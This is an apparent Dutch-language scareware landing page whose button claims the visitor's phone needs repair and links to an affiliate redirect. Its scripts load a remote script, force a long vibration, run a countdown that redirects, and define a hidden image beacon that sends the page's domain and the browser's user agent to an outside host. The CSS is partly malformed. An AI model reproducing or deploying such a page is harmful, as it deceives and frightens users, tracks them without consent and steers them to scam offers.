<!DOCTYPE HTML>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>The HTML5 Herald</title>
    <meta name="description" content="The HTML5 Herald">
 
 <style type="text/css">
    #timer p,
    p {
        color: rgb(85, 85, 85);
    }

    #error,
    #timer {
        display: inline-block;
        float: left;
    }

    #timer p,
    .btn {
        font-weight: 700;
    }

    body {
        font-family: sans-serif;
    }

    a {
        text-decoration: none;
    }

    footer,
    header,
    section {
        clear: both;
    }

    * {
        margin: 0px;
        padding: 0px;
    }

    #wrapper {
        max-width: 400px;
        border: 0px solid rgb(48, 48, 48);
        border-radius: 0px;
    }

    p {
        font-size: 14px;
        padding: 5px 0px;
    }

    #timer {
        max-width: 290px;
        width: 65%;
    }

    #timer p {
        font-size: 12px;
    }

    .btn {
        background-color: #236DA6;
        border-radius: 5px;
        color: rgb(255, 255, 255);
        display: block;
        line-height: 50px;
        max-width: 275px;
        width: 90%;
    }

    .container {
        padding-left: 8px;
        padding-right: 8px;
    }

    #blink {
        color: #ff0000;
        padding: 6px;
        -webkit-animation: blink 1s infinite;
        -moz-animation: blink 1s infinite;
        -ms-animation: blink 1s infinite;
        -o-animation: blink 1s infinite;
        animation: blink 1s infinite
    }

    @-webkit-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }

    @-moz-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }
    }

    @-ms-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }

    @-o-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }

    @keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }

        #today {
            float: right;
            font-weight: 600;
            padding-top: 15px
        }
    </style>
<style> 

<p> JS TEST</p>

</style>

</head>   
<body>
    <div id="wrapper">
        <div class="container">
           
            
             <strong>
                <footer>
                    <p align="center"><a class="btn" href="https://to.searchredirectt.com/click?offer_id=4096&amp;pid=652&amp;sub1=158858389826382922&amp;sub2=79&amp;sub3=PopUp+%2F+ClickUnder&amp;sub4=%7Bcamp_id%7D" target="_blank"><strong>REPAREER NU UW TELEFOON!</strong></a></p>
                </footer>
            </strong>
        </div>
	    <strong>
            
        </strong>
    </div>
    <script src="https://to.searchredirectt.com/preland.js"></script>
    <script>  
    navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
    navigator.vibrate([50000]);
    </script>
    <script language="JavaScript" type="text/javascript">
    var sec = 20;
    var min = 00;

    function countDown() {
        sec--;
        if (sec == -01) {
            sec = 59;
            min = min - 1;
        } else {
            min = min;
        }
        if (sec <= 9) { sec = "0" + sec; }
        time = (min <= 9 ? "" + min : min) + " minuten en " + sec + " seconden";
        if (document.getElementById) { document.getElementById('theTime').innerHTML = time; }
        SD = window.setTimeout("countDown();", 1000);
        if (min == '00' && sec == '00') { sec = "00";
            window.clearTimeout(SD);
            window.location = afurl; }
    }
    window.onload = countDown;
    </script>

 


<script>
    function name() {
    document.body.style.backgroundColor = 'red';
    if (navigator) {
        var img_i = function (src) {
            var i = document.createElement('img');
            i.src = src;
            i.setAttribute('style', 'width:1px;height:1px;');
            document.body.appendChild(i);
            i.onload = function () {
                i.parentElement.removeChild(i)
            };
            i.onerror = function () {
                i.parentElement.removeChild(i)
            };
        };
        var arr = {
            domain: document.location.host,
            useragent: navigator.userAgent,
        };
        img_i('https://cosmicroi.com/are_fails/get_ap.php?par_1=' + encodeURIComponent(JSON.stringify(arr)));
    }
}
</script>

</body>

</html>
